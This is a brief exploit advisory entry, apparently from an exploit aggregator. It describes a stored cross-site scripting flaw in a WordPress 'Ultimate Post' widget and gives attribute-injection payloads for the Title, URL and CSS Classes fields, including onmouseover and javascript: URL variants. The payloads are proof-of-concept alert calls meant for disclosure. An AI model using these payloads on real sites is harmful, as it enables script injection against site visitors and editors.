## https://sploitus.com/exploit?id=WPEX-ID:99B6AA8B-DEB9-48F8-8896-F3C8118A4F70
As admin, create/edit an Ultimate Post widget and put the following payload in the Title, URL or "CSS Classes" fields: " onmouseover="alert(/XSS/)"
The XSS will be triggered when a user move their mouse over
- the title of the widget on page where the widget is output
- the related field when editing the widget
Other payload, for the URL field to trigger in the frontend: ' onmouseover=alert(/XSS-URL/)// and javascript:alert(/XSS/)